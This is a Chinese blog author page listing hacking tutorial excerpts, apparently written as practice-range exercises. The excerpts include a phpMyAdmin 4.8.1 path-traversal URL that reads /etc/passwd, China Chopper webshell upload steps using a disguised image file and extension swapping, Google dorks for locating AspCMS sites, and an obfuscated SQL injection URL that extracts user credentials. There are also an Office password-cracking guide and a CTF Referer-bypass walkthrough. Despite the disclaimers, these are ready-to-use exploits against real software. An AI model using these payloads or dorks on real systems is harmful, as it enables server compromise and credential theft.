封神
徐林2333
这个作者很懒,什么都没留下…
展开
-
phpmyadmin 4.8.1漏洞复现(实战演示)
第一步,根据该版本CVE漏洞构造URL,在index.php后添加内容,如显示/etc/passwd详细内容。/* 方法一 */http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd/* 方法二 */http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../.原创 2020-12-21 10:06:31 · 1691 阅读 · 0 评论 -
xls解密(实战详细教程)
ps:本次教程,使用靶场实战演示,切勿在未授权的情况下用于非法用途 !1.我们从网上下载了一份xmls文档,发现带有加密无法直接读取,接下来我们开始解密。2.第一步我们需要破解工具去网上下载:Advanced Office Password Recovery下载完成打开aopr.exe文件3.点击左上角的open file选择我们要破解的.xls文件,开始破解4.第一行可以看到破解出来的密码是accs,打开之前加密的xls文件,输入accs。成功 破解 Gameover!注:如有原创 2020-12-18 10:03:43 · 5501 阅读 · 0 评论 -
中国菜刀使用(实战正确姿势)
图片上传漏洞:ps:此教程为靶场实战,切勿用于非法用途1. 准备制作图片马,随便找到一张图片重命名为1.jpg2. 准备好一句话木马,这里我命名为1.php3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg文件夹中会自动生成一个2.jpg文件。4. 选择上传2.jpg5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。6. 可以看到上传原创 2020-12-17 23:39:47 · 10109 阅读 · 7 评论 -
0day漏洞(aspcms)漏洞实战
1. 谷歌搜索关键字Powered by aspcms.com Copyright ?2010-2011intitle:Powered by AspCms22. 接着利用注入漏洞/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user3.原创 2020-12-16 08:27:05 · 3527 阅读 · 1 评论 -
CTF封神台第三关通关
分析代码① 从请求头中拿到Referer,并赋值给ComeUrl。② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。步骤:1.第二章admin是假后台2.通过御剑扫描发现还存在一个admin123后台3.利用第二章的密码可以进入后台4.打开burp suite,后台点击左侧任意选项5.查看 burp su原创 2020-11-25 23:05:54 · 999 阅读 · 1 评论